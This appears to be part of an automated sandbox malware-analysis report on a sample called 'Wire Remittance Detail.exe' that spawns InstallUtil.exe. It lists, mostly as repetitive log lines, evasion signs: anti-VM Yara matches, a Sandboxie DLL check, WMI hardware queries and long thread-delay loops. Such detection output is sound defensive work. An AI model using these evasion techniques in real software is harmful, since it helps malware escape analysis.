                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeMemory allocated: 5040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2241Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7582Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2012Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7806Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4036Thread sleep count: 2241 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4036Thread sleep count: 7582 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99641s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99516s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99292s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99172s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -99063s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98953s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98844s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98238s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -98110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -97110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -96110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95615s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95422s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95282s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95157s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -95032s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94922s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94813s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94688s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94563s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -94094s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -93969s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -93860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604Thread sleep time: -93735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2684Thread sleep count: 2012 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2684Thread sleep count: 7806 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99204s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -99079s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98954s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98829s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98579s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98414s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98167s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -98062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97938s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97813s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97688s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97563s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97344s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -97110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -96110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -95110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -94110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -93985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532Thread sleep time: -93860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99292Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98238Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95735Jump to behavior
